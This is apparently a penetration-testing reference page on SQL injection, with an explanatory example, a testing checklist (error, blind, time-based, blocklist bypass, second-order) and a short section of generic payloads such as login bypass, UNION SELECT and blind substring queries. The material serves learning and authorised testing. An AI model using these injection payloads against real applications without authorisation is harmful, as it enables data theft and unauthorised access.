# SQL injection overview

## What is it?

SQL injection is where an attacker is able to manipulate database queries made by an application.&#x20;

**A simple example**

* A vulnerable web application has the endpoint `/search?product={productName}`
* When a request is made, the application uses SQL to search for the product `SELECT * FROM products WHERE name=$productName`
* If an attacker inserts a payload into `{productName}` such as `anything' UNION SELECT password FROM users WHERE username = 'admin` that modifies the query, sensitive data could be leaked.
* The vulnerable application sends this query to the database and the database returns the admin's password.

It's important to note that a payload or attack may change depending on the application, the query, and the database. SQL injection can often lead to:

* Sensitive data exposure
* Data manipulation
* Remote code execution
* Denial of service

**Other learning resources:**

* PostSwigger: <https://portswigger.net/web-security/sql-injection>
* Swisskeyrepo: <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection>

**Writeups:**

* <https://infosecwriteups.com/how-i-found-multiple-sql-injections-in-5-minutes-in-bug-bounty-40155964c498>

*Have a good writeup & want to share it here? Drop me a message on LinkedIn.*

## Checklist

* [ ] What is the technology stack you're attacking?&#x20;
  * [ ] What application/framework is being used
  * [ ] What backend DB is being used
  * [ ] Is there an ORM?
* [ ] Verify injection points
  * [ ] URL parameters
  * [ ] Form fields
  * [ ] HTTP headers (e.g. cookies, etc)
  * [ ] Out-of-band (e.g. data retrieved from a third party)
* [ ] Test ' and "
  * [ ] Can you trigger an error?
  * [ ] Can you trigger a different response?
* [ ] Test with SQLmap
* [ ] Test for login bypass `' and 1=1-- -` etc
* [ ] Test for blind SQLi
  * [ ] Test for errors
  * [ ] Test for conditional responses
  * [ ] Test for conditional errors
  * [ ] Test for time delays
* [ ] Test for out-of-band interactions
* [ ] Test for NoSQL injection
* [ ] Is there a blocklist?
  * [ ] Can you bypass the blocklist?
    * [ ] Encoding
    * [ ] Double encoding
    * [ ] Alternative characters
    * [ ] Alternative payloads
* [ ] Test for second-order SQLi

## Exploitation

```sql
# Basic login bypass
' AND 1=1#
```

```sql
# UNION SELECT
' UNION SELECT null,null FROM users-- -
```

```sql
# Blind
' AND SUBSTR((SELECT version()),1,1)='7'#
CAST((SELECT example_column FROM example_table) AS int)
```